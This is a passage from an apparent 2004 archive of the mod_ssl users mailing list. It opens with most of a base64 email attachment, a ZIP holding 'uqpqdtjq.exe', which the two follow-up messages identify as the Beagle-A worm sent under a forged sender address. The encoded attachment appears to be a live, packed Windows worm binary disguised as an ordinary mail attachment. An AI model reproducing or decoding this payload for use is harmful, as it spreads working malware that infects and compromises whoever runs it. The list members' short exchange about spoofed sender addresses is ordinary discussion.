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
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAADgdVsw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAdXFwcWR0anEuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------tclslnsgxhouadpcgpbl--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 28 00:31:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2E11DA8948; Sat, 28 Feb 2004 00:31:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mra02.ex.eclipse.net.uk (mra02.ex.eclipse.net.uk [212.104.129.89])
	by master.modssl.org (Postfix) with ESMTP id 39F99A8934
	for ; Sat, 28 Feb 2004 00:30:48 +0100 (CET)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mra02.ex.eclipse.net.uk (Postfix) with ESMTP id 515164066F0
	for ; Fri, 27 Feb 2004 23:30:00 +0000 (GMT)
Received: from mra02.ex.eclipse.net.uk ([127.0.0.1])
 by localhost (mra02.ex.eclipse.net.uk [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 31843-01-15 for ;
 Fri, 27 Feb 2004 23:29:59 +0000 (GMT)
Received: from charon (unknown [81.168.14.88])
	by mra02.ex.eclipse.net.uk (Postfix) with SMTP id A2D8A406337
	for ; Fri, 27 Feb 2004 23:29:59 +0000 (GMT)
Message-ID: <001901c3fd89$b856f7c0$c400a8c0@charon>
From: "madhon" 
To: 
Subject: rse has beagle-a virus ?
Date: Fri, 27 Feb 2004 23:30:43 -0000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1209
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1213
X-Virus-Scanned: by Eclipse VIRUSshield at eclipse.net.uk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "madhon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

just had a couple of copies of this come through from rse@Engelschall ...
someone needs to check their machine


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 28 00:50:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 824EAA8941; Sat, 28 Feb 2004 00:50:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from boggle.pobox.com (boggle.pobox.com [208.58.1.193])
	by master.modssl.org (Postfix) with ESMTP id BDE6FA8937
	for ; Sat, 28 Feb 2004 00:50:38 +0100 (CET)
Received: from colander (localhost [127.0.0.1])
	by boggle.pobox.com (Postfix) with ESMTP id 879A650028
	for ; Fri, 27 Feb 2004 18:50:37 -0500 (EST)
Received: from jester.pobox.com (jester.pobox.com [64.71.166.114])
	by boggle.pobox.com (Postfix) with ESMTP
	for ; Fri, 27 Feb 2004 18:50:35 -0500 (EST)
Received: from yourpa86z1i3g7 (unknown [65.73.239.18])
	by jester.pobox.com (Postfix) with ESMTP id 5018A88
	for ; Fri, 27 Feb 2004 18:50:35 -0500 (EST)
From: "Dave Paris" 
To: 
Subject: RE: rse has beagle-a virus ?
Date: Fri, 27 Feb 2004 18:50:39 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
In-Reply-To: <001901c3fd89$b856f7c0$c400a8c0@charon>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

More likely a faked 'From' address.  While possible, it's highly improbable
that the source is actually Ralf's machine.  I've routed my copies to
/dev/null so I can't examine the headers to determine if the source address
actually resides in Europe or not.

Kind Regards,
-dsp

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of madhon
> Sent: Friday, February 27, 2004 6:31 PM
> To: modssl-users@modssl.org
> Subject: rse has beagle-a virus ?
>
>
> just had a couple of copies of this come through from rse@Engelschall ...
> someone needs to check their machine
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
